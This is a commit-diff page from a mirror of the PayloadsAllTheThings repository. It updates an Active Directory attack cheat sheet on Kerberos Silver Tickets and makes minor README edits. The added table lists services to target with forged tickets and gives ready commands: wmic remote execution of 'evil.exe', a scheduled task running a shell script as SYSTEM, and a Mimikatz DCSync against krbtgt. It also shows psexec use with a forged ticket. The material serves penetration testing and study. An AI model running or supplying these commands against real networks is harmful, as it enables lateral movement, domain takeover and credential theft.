mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Silver Ticket with services list
This commit is contained in:
parent
c7e3ea005e
commit
33129f2b4c
BIN
.github/banner.png
vendored
Normal file
BIN
.github/banner.png
vendored
Normal file
Binary file not shown.
After Width: | Height: | Size: 809 KiB |
@ -722,7 +722,7 @@ Mitigations:
|
||||
|
||||
### Pass-the-Ticket Silver Tickets
|
||||
|
||||
Forging a TGS require machine accound password (key) or NTLM hash from the KDC
|
||||
Forging a TGS require machine accound password (key) or NTLM hash of the service account.
|
||||
|
||||
```powershell
|
||||
# Create a ticket for the service
|
||||
@ -739,6 +739,19 @@ root@kali:/tmp$ export KRB5CCNAME=/home/user/ticket.ccache
|
||||
root@kali:/tmp$ ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
||||
```
|
||||
|
||||
Interesting services to target with a silver ticket :
|
||||
|
||||
| Service Type | Service Silver Tickets | Attack |
|
||||
|---------------------------------------------|------------------------|--------|
|
||||
| WMI | HOST + RPCSS | `wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"` |
|
||||
| PowerShell Remoting | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` |
|
||||
| WinRM | HTTP + wsman | `New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC` |
|
||||
| Scheduled Tasks | HOST | `schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"` |
|
||||
| Windows File Share (CIFS) | CIFS | `dir \\dc01\c$` |
|
||||
| LDAP operations including Mimikatz DCSync | LDAP | `lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt` |
|
||||
| Windows Remote Server Administration Tools | RPCSS + LDAP + CIFS | / |
|
||||
|
||||
|
||||
Mitigations:
|
||||
* Set the attribute "Account is Sensitive and Cannot be Delegated" to prevent lateral movement with the generated ticket.
|
||||
|
||||
@ -1635,6 +1648,7 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
|
||||
* [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/)
|
||||
* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/)
|
||||
* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
|
||||
* [How Attackers Use Kerberos Silver Tickets to Exploit Systems - Sean Metcalf](https://adsecurity.org/?p=2011)
|
||||
* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
||||
* [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html)
|
||||
* [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html)
|
||||
|
@ -1,4 +1,4 @@
|
||||
# Payloads All The Things
|
||||
# Payloads All The Things [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/Koalemos)
|
||||
|
||||
A list of useful payloads and bypasses for Web Application Security.
|
||||
Feel free to improve with your payloads and techniques !
|
||||
@ -8,13 +8,13 @@ You can also contribute with a :beers: IRL, or using the sponsor button.
|
||||
|
||||
|
||||
<p align="center">
|
||||
<img src="https://repository-images.githubusercontent.com/71220757/fac34f00-9854-11ea-9d6f-55fe78f233fb">
|
||||
<img src="https://repository-images.githubusercontent.com/71220757/cc2fcb80-da73-11ea-8288-8ba1e3193f6d">
|
||||
</p>
|
||||
|
||||
|
||||
Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter:
|
||||
|
||||
- README.md - vulnerability description and how to exploit it
|
||||
- README.md - vulnerability description and how to exploit it, including several payloads
|
||||
- Intruder - a set of files to give to Burp Intruder
|
||||
- Images - pictures for the README.md
|
||||
- Files - some files referenced in the README.md
|
||||
|
Loading…
Reference in New Issue
Block a user